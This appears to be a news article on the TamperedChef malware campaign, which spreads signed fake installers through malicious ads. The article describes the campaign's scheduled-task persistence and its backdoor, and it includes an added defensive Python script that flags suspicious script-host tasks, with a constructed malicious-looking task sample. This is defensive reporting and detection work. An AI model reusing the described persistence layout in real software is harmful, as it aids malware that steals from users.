    TamperedChef is the name assigned to a long-running campaign that has leveraged seemingly legitimate installers for various utilities to distribute an information stealer malware of the same name. It’s assessed to be part of a broader set of attacks codenamed EvilAI that uses lures related to artificial intelligence (AI) tools and software for malware propagation.

    To lend these counterfeit apps a veneer of legitimacy, the attackers use code-signing certificates issued for shell companies registered in the U.S., Panama, and Malaysia to sign them, and acquire new ones under a different company name as older certificates are revoked.

    Acronis described the infrastructure as “industrialized and business-like,” effectively allowing the operators to steadily churn out new certificates and exploit the inherent trust associated with signed applications to disguise the malicious software as legitimate.

    It’s worth noting at this stage that the malware tracked as TamperedChef by Truesec and G DATA is also referred to as BaoLoader by Expel, and is different from the original TamperedChef malware that was embedded within a malicious recipe application distributed as part of the EvilAI campaign.

    Acronis told The Hacker News that it’s using TamperedChef to refer to the malware family, since it has already been widely adopted by the cybersecurity community. “This helps avoid confusion and stay consistent with existing publications and detection names used by other vendors, which also refer to the malware family as TamperedChef,” it said.

    A typical attack plays out as follows: users who search for PDF editors or product manuals on search engines like Bing are served malicious ads or poisoned URLs that, when clicked, take them to booby-trapped domains registered on NameCheap, which deceive them into downloading the installers.

    Once the installer is executed, users are prompted to agree to the program’s licensing terms. As soon as installation completes, it launches a new browser tab displaying a thank-you message to keep up the ruse. In the background, however, an XML file is dropped to create a scheduled task designed to launch an obfuscated JavaScript backdoor.


    The backdoor, in turn, connects to an external server and sends basic information, such as session ID, machine ID, and other metadata, as a JSON string that is encrypted, Base64-encoded, and transmitted over HTTPS.
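    The persistence step described above (an XML task definition that launches an obfuscated JavaScript file) leaves a concrete artifact defenders can triage. The following is an added example, not code from Acronis or from the article: it parses a Windows Task Scheduler XML definition and flags the combination the report describes, namely a script host (assumed here to be wscript.exe or cscript.exe, which the article does not name) running a script from a user-writable directory under a logon or boot trigger. The task names, paths and XML samples are constructed for illustration.

```python
"""Triage Windows Task Scheduler XML for script-host persistence.

Added example, not Acronis' tooling or code from the article. It assumes the
task follows the standard Task Scheduler XML schema and that the backdoor is
launched through a Windows script host; both sample definitions below are
constructed, not real TamperedChef artifacts.
"""
import re
import xml.etree.ElementTree as ET

# Namespace used by exported / dropped Task Scheduler XML definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Script hosts commonly abused to run JavaScript/VBScript payloads (assumed, not from the article).
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
SCRIPT_EXT = re.compile(r"\.(js|jse|vbs|vbe|wsf|hta)\b", re.IGNORECASE)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|ProgramData|Users\\Public)\\", re.IGNORECASE)
PERSISTENCE_TRIGGERS = ("LogonTrigger", "BootTrigger")


def _local(tag: str) -> str:
    """Strip the XML namespace from an element tag."""
    return tag.split("}")[-1]


def triage_task_xml(xml_text: str) -> dict:
    """Return a dict with the task name, a list of findings and a verdict.

    The verdict is True only when a script host is launched, a script file is
    referenced and the task is wired to a logon/boot trigger: the shape of the
    scheduled task described in the TamperedChef report.
    """
    root = ET.fromstring(xml_text)
    findings = []
    script_host = script_file = False

    for ex in root.iterfind(".//t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        exe = re.split(r"[\\/]", cmd)[-1].lower()
        if exe in SCRIPT_HOSTS:
            script_host = True
            findings.append(f"script host launched: {exe}")
        if SCRIPT_EXT.search(args) or SCRIPT_EXT.search(cmd):
            script_file = True
            findings.append("script file referenced in task action")
        if USER_WRITABLE.search(args) or USER_WRITABLE.search(cmd):
            findings.append("task action references a user-writable path")

    triggers = [_local(t.tag) for t in root.iterfind(".//t:Triggers/*", NS)]
    persistence = any(t in PERSISTENCE_TRIGGERS for t in triggers)
    if persistence:
        findings.append("persistence trigger: " + ", ".join(triggers))

    hidden = root.findtext(".//t:Settings/t:Hidden", default="", namespaces=NS)
    if hidden.strip().lower() == "true":
        findings.append("task is hidden from the Task Scheduler UI")

    name = root.findtext(".//t:RegistrationInfo/t:URI", default="", namespaces=NS).strip()
    return {
        "name": name,
        "findings": findings,
        "suspicious": script_host and script_file and persistence,
    }


# Constructed sample resembling the persistence shape described in the report.
SUSPICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\ExampleUpdater</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//B //E:jscript "C:\Users\alice\AppData\Roaming\Example\update.js"</Arguments>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign sample: a vendor updater on a calendar trigger.
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\VendorUpdate</URI></RegistrationInfo>
  <Triggers><CalendarTrigger><Enabled>true</Enabled></CalendarTrigger></Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\Vendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for sample in (SUSPICIOUS_TASK_XML, BENIGN_TASK_XML):
        result = triage_task_xml(sample)
        print(result["name"], "suspicious" if result["suspicious"] else "clean", result["findings"])
```

    In practice the same function can be run over every file under `C:\Windows\System32\Tasks` (where registered task definitions are stored as XML) or over the XML a sandbox captures when the installer runs; the verdict deliberately requires all three indicators together so that legitimate administrative scripts on a logon trigger produce findings but no automatic alert.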

    That being said, the end goals of the campaign remain nebulous. Some iterations have been found to facilitate advertising fraud, indicating their financial motives. It’s also possible that the threat actors are looking to monetize their access to other cybercriminals, or harvest sensitive data and sell it in underground forums to enable fraud.

    Telemetry data shows that a significant concentration of infections has been identified in the U.S., and to a lesser extent in Israel, Spain, Germany, India, and Ireland. Healthcare, construction, and manufacturing are the most affected sectors.

    “These industries appear especially vulnerable to this type of campaign, likely due to their reliance on highly specialized and technical equipment, which often prompts users to search online for product manuals – one of the behaviors exploited by the TamperedChef campaign,” the researchers noted.


    Source: thehackernews.com…